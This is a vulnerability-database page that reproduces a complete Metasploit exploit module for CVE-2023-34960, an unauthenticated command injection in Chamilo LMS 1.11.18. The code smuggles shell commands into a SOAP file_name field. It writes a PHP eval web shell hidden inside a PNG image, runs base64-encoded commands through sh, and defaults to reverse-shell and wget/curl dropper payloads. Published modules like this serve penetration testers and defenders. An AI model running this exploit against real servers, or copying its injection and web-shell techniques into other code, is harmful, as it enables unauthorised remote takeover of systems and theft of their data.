Vulners
Lucene search
Chamilo 1.11.18 Command Injection
🗓️ 24 Aug 2023 00:00:00Reported by RandoriSec, h00die-gr3y, metasploit.comType 
packetstorm🔗 packetstormsecurity.com👁 392 Views
| Reporter | Title | Published | Views | Family All 28 |
|---|---|---|---|---|
 | Exploit for Command Injection in Chamilo | 22 Jul 202305:27 | – | githubexploit |
| Exploit for Command Injection in Chamilo | 22 Jul 202305:27 | – | githubexploit |
| Exploit for Command Injection in Chamilo | 24 Jul 202320:51 | – | githubexploit |
| Exploit for Command Injection in Chamilo | 22 Jul 202305:27 | – | githubexploit |
| Exploit for Command Injection in Chamilo | 1 Aug 202308:09 | – | githubexploit |
| Exploit for Command Injection in Chamilo | 9 Jun 202310:32 | – | githubexploit |
 | Chamilo 1.11.18 Command Injection Exploit | 24 Aug 202300:00 | – | zdt |
 | CVE-2023-34960 | 1 Aug 202302:15 | – | attackerkb |
 | The vulnerability of the wsConvertPpt component in the Chamilo LMS e-learning and content management system allows a hacker to execute arbitrary commands. | 4 Aug 202500:00 | – | bdu_fstec |
 | CVE-2023-34960 | 9 Jun 202310:49 | – | circl |
10
`# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
include Msf::Exploit::FileDropper
include Msf::Exploit::Format::PhpPayloadPng
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Chamilo unauthenticated command injection in PowerPoint upload',
'Description' => %q{
Chamilo is an e-learning platform, also called Learning Management Systems (LMS).
This module exploits an unauthenticated remote command execution vulnerability
that affects Chamilo versions `1.11.18` and below (CVE-2023-34960).
Due to a functionality called Chamilo Rapid to easily convert PowerPoint
slides to courses on Chamilo, it is possible for an unauthenticated remote
attacker to execute arbitrary commands at OS level using a malicious SOAP
request at the vulnerable endpoint `/main/webservices/additional_webservices.php`.
},
'Author' => [
'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Module Author
'Randorisec' # Original research
],
'References' => [
['CVE', '2023-34960'],
['URL', 'https://www.randorisec.fr/pt/chamilo-1.11.18-multiple-vulnerabilities'],
['URL', 'https://attackerkb.com/topics/VVJpMeSpUP/cve-2023-34960']
],
'License' => MSF_LICENSE,
'Platform' => ['php', 'unix', 'linux'],
'Privileged' => false,
'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X64, ARCH_X86, ARCH_AARCH64],
'Targets' => [
[
'PHP',
{
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Type' => :php,
'DefaultOptions' => {
'PAYLOAD' => 'php/meterpreter/reverse_tcp'
}
}
],
[
'Unix Command',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_cmd,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_bash'
}
}
],
[
'Linux Dropper',
{
'Platform' => 'linux',
'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
'Type' => :linux_dropper,
'Linemax' => 65535,
'CmdStagerFlavor' => ['wget', 'curl'],
'DefaultOptions' => {
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
}
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => '2023-06-01',
'DefaultOptions' => {
'SSL' => false,
'RPORT' => 80
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
'Reliability' => [REPEATABLE_SESSION]
}
)
)
register_options([
OptString.new('TARGETURI', [ true, 'The Chamilo endpoint URL', '/' ]),
OptString.new('WEBSHELL', [
false, 'The name of the webshell with extension. Webshell name will be randomly generated if left unset.', nil
], conditions: %w[TARGET == 0])
])
end
def soap_request(cmd)
# create SOAP request exploiting CVE-2023-34960
# Randomize ppt size
ppt_size = "#{rand(720..1440)}x#{rand(360..720)}"
return <<~EOS
<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:ns1="#{target_uri.path}"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:ns2="http://xml.apache.org/xml-soap"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<ns1:wsConvertPpt>
<param0 xsi:type="ns2:Map">
<item>
<key xsi:type="xsd:string">file_data</key>
<value xsi:type="xsd:string"></value>
</item>
<item>
<key xsi:type="xsd:string">file_name</key>
<value xsi:type="xsd:string">`{{}}`.pptx'|" |#{cmd}||a #</value>
</item>
<item>
<key xsi:type="xsd:string">service_ppt2lp_size</key>
<value xsi:type="xsd:string">#{ppt_size}</value>
</item>
</param0>
</ns1:wsConvertPpt>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
EOS
end
def upload_webshell
# randomize file name if option WEBSHELL is not set
@webshell_name = if datastore['WEBSHELL'].blank?
"#{Rex::Text.rand_text_alpha(8..16)}.php"
else
datastore['WEBSHELL'].to_s
end
@post_param = Rex::Text.rand_text_alphanumeric(1..8)
# inject PHP payload into the PLTE chunk of a PNG image to hide the payload
php_payload = "<?php @eval(base64_decode($_POST[\'#{@post_param}\']));?>"
png_webshell = inject_php_payload_png(php_payload, injection_method: 'PLTE')
return nil if png_webshell.nil?
# encode webshell data and write to file on the target for execution
payload = Base64.strict_encode64(png_webshell.to_s)
cmd = "echo #{payload}|openssl enc -a -d > ./#{@webshell_name}"
return send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'main', 'webservices', 'additional_webservices.php'),
'ctype' => 'text/xml; charset=utf-8',
'data' => soap_request(cmd).to_s
})
end
def execute_php(cmd, _opts = {})
payload = Base64.strict_encode64(cmd)
return send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'main', 'inc', 'lib', 'ppt2png', @webshell_name),
'ctype' => 'application/x-www-form-urlencoded',
'vars_post' => {
@post_param => payload
}
})
end
def execute_command(cmd, _opts = {})
# Encode payload with base64 and decode with openssl (most common installed on unix systems)
payload = Base64.strict_encode64(cmd)
cmd = "echo #{payload}|openssl enc -a -d|sh"
return send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'main', 'webservices', 'additional_webservices.php'),
'ctype' => 'text/xml; charset=utf-8',
'data' => soap_request(cmd).to_s
})
end
def check
# Checking if the target is vulnerable by echoing a randomised marker that will return the marker in the response.
print_status("Checking if #{peer} can be exploited.")
marker = Rex::Text.rand_text_alphanumeric(8..16)
res = execute_command("echo #{marker}")
if res && res.code == 200 && res.body.include?('wsConvertPptResponse') && res.body.include?(marker)
CheckCode::Vulnerable
else
CheckCode::Safe('No valid response received from the target.')
end
end
def exploit
print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
case target['Type']
when :php
res = upload_webshell
fail_with(Failure::PayloadFailed, 'Web shell upload error.') unless res && res.code == 200 && res.body.include?('wsConvertPptResponse')
register_file_for_cleanup(@webshell_name.to_s)
execute_php(payload.encoded)
when :unix_cmd
execute_command(payload.encoded)
when :linux_dropper
execute_cmdstager({ linemax: target.opts['Linemax'] })
end
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Aug 2023 00:00Current
7.1High risk
Vulners AI Score7.1
CVSS 3.19.8
EPSS0.99397
SSVC